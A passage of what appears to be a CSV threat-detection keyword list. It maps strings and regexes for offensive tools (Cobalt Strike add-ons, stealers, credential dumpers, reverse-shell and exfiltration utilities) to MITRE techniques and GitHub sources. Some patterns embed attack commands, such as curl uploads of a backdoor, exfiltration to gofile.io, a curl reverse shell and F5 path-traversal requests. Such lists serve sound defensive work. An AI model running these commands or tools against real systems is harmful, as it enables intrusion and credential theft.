- TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*CSharpNamedPipeLoader*",".{0,1000}CSharpNamedPipeLoader.{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","321","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" "*csload.net/*/muma.*",".{0,1000}csload\.net\/.{0,1000}\/muma\..{0,1000}","offensive_tool_keyword","cobaltstrike","A cobaltstrike shellcode loader - past domestic mainstream antivirus software","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/csload.net","1","1","N/A","10","10","122","14","2021-05-21T02:36:03Z","2021-05-20T08:24:16Z" "*csOnvps*teamserver*",".{0,1000}csOnvps.{0,1000}teamserver.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*cSploit-*.apk*",".{0,1000}cSploit\-.{0,1000}\.apk.{0,1000}","offensive_tool_keyword","csploit","The most complete and advanced IT security professional toolkit on Android.","T1555 - T1569 - T1210","TA0002 - TA0003 - TA0009","N/A","N/A","Frameworks","https://github.com/cSploit/android","1","1","N/A","N/A","10","3236","1093","2024-04-27T22:17:26Z","2014-10-04T05:53:29Z" "*cSploit/android*",".{0,1000}cSploit\/android.{0,1000}","offensive_tool_keyword","csploit","The most complete and advanced IT security professional toolkit on Android.","T1555 - T1569 - T1210","TA0002 - TA0003 - TA0009","N/A","N/A","Frameworks","https://github.com/cSploit/android","1","1","N/A","N/A","10","3236","1093","2024-04-27T22:17:26Z","2014-10-04T05:53:29Z" "*csprecon -*",".{0,1000}csprecon\s\-.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*CS-Remote-OPs-BOF*",".{0,1000}CS\-Remote\-OPs\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*csrf_to_beef*",".{0,1000}csrf_to_beef.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*CSSG_load.cna*",".{0,1000}CSSG_load\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","612","106","2024-01-02T20:56:41Z","2021-01-12T14:39:06Z" "*CStealer Builder ~ *",".{0,1000}CStealer\sBuilder\s\~\s.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","0","N/A","10","8","756","389","2024-04-26T21:18:07Z","2021-08-03T00:52:45Z" "*CStealer_assets\*",".{0,1000}CStealer_assets\\.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","0","N/A","10","8","756","389","2024-04-26T21:18:07Z","2021-08-03T00:52:45Z" "*C-Sto/gosecretsdump*",".{0,1000}C\-Sto\/gosecretsdump.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*C-Sto/goWMIExec*",".{0,1000}C\-Sto\/goWMIExec.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","1","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "*cs-token-vault.git*",".{0,1000}cs\-token\-vault\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","136","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "*CT_Indirect_Syscalls.c*",".{0,1000}CT_Indirect_Syscalls\.c.{0,1000}","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","2","119","18","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z" "*CT_Indirect_Syscalls.exe*",".{0,1000}CT_Indirect_Syscalls\.exe.{0,1000}","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","2","119","18","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z" "*CT_Indirect_Syscalls.sln*",".{0,1000}CT_Indirect_Syscalls\.sln.{0,1000}","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","2","119","18","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z" "*CT_Indirect_Syscalls.vcxproj*",".{0,1000}CT_Indirect_Syscalls\.vcxproj.{0,1000}","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","2","119","18","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z" "*cube0x0/LdapSignCheck*",".{0,1000}cube0x0\/LdapSignCheck.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","161","24","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" "*cube0x0/MiniDump*",".{0,1000}cube0x0\/MiniDump.{0,1000}","offensive_tool_keyword","onex","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","1","N/A","N/A","3","269","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z" "*cuddlephish*stealer.js",".{0,1000}cuddlephish.{0,1000}stealer\.js","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","4","311","25","2024-03-28T14:17:28Z","2023-08-02T14:30:41Z" "*cuddlephish-main*",".{0,1000}cuddlephish\-main.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","4","311","25","2024-03-28T14:17:28Z","2023-08-02T14:30:41Z" "*CUPLIS BYPASSS SHELL*",".{0,1000}CUPLIS\sBYPASSS\sSHELL.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*curi0usJack*",".{0,1000}curi0usJack.{0,1000}","offensive_tool_keyword","Github Username","github user hosting malicious code and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/curi0usJack","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*curl * --upload-file backdoor.php -v*",".{0,1000}curl\s.{0,1000}\s\-\-upload\-file\sbackdoor\.php\s\-v.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*curl --connect-timeout 3.14 -s ifconfig.me*",".{0,1000}curl\s\-\-connect\-timeout\s3\.14\s\-s\sifconfig\.me.{0,1000}","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","0","N/A","8","2","117","18","2023-09-09T10:38:38Z","2023-06-02T10:06:41Z" "*curl -F * https://*.gofile.io/uploadFile*",".{0,1000}curl\s\-F\s.{0,1000}\shttps\:\/\/.{0,1000}\.gofile\.io\/uploadFile.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*curl http*/handling-form-submission-complete/rce.jsp*",".{0,1000}curl\shttp.{0,1000}\/handling\-form\-submission\-complete\/rce\.jsp.{0,1000}","offensive_tool_keyword","Spring4Shell","Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/reznok/Spring4Shell-POC","1","0","N/A","N/A","4","307","234","2022-08-04T18:26:18Z","2022-03-31T00:24:28Z" "*curl http://172.23.0.1:1337/main*",".{0,1000}curl\shttp\:\/\/172\.23\.0\.1\:1337\/main.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","1","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*curl https://curlshell*",".{0,1000}curl\shttps\:\/\/curlshell.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*curl -Ns telnet://*",".{0,1000}curl\s\-Ns\stelnet\:\/\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*curl --output *http*/tomcatwar.jsp?*",".{0,1000}curl\s\-\-output\s.{0,1000}http.{0,1000}\/tomcatwar\.jsp\?.{0,1000}","offensive_tool_keyword","SpringCore0day","SpringCore0day from share.vx-underground.org & some additional links","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/craig/SpringCore0day","1","0","N/A","N/A","4","393","187","2022-03-31T11:54:22Z","2022-03-30T15:50:28Z" "*curl -s -o test.elf http://0.0.0.0:8001/test.elf*",".{0,1000}curl\s\-s\s\-o\stest\.elf\shttp\:\/\/0\.0\.0\.0\:8001\/test\.elf.{0,1000}","offensive_tool_keyword","POC","Achieving a Reverse Shell Exploit for Apache ActiveMQ (CVE_2023-46604)","T1190 - T1059 - T1071 - T1105 - T1041","TA0001 - TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ","1","1","N/A","9","1","91","31","2024-01-20T16:59:23Z","2023-11-03T22:06:09Z" "*curl -sk 'https://*/tmui/login.jsp/.. /tmui/util/getTabSet.jsp?tabId=Vulnerable*",".{0,1000}curl\s\-sk\s\'https\:\/\/.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/util\/getTabSet\.jsp\?tabId\=Vulnerable.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*curl -v -k 'https://*/tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd*",".{0,1000}curl\s\-v\s\-k\s\s\'https\:\/\/.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/fileRead\.jsp\?fileName\=\/etc\/passwd.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","370","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" "*curl -v -k 'https://*/tmui/login.jsp/.. /tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin*",".{0,1000}curl\s\-v\s\-k\s\s\'https\:\/\/.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/tmshCmd\.jsp\?command\=list\+auth\+user\+admin.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","370","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" "*curl -x socks5h://127.0.0.1:*",".{0,1000}curl\s\-x\ssocks5h\:\/\/127\.0\.0\.1\:.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*curl*/tmp/exploit-dirty-pipe*",".{0,1000}curl.{0,1000}\/tmp\/exploit\-dirty\-pipe.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","1","8","5","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z" "*curlshell.py*",".{0,1000}curlshell\.py.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*cursed chrome",".{0,1000}cursed\schrome","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*cursed cookies",".{0,1000}cursed\scookies","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*Cursors\cursorinit.vbs*",".{0,1000}Cursors\\cursorinit\.vbs.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*custom_payload_generator.*",".{0,1000}custom_payload_generator\..{0,1000}","offensive_tool_keyword","cobaltstrike","Various Aggressor Scripts I've Created.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/offsecginger/AggressorScripts","1","1","N/A","10","10","145","30","2022-01-01T19:04:27Z","2018-11-30T03:14:45Z" "*CustomKeyboardLayoutPersistence*",".{0,1000}CustomKeyboardLayoutPersistence.{0,1000}","offensive_tool_keyword","cobaltstrike","Achieve execution using a custom keyboard layout","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 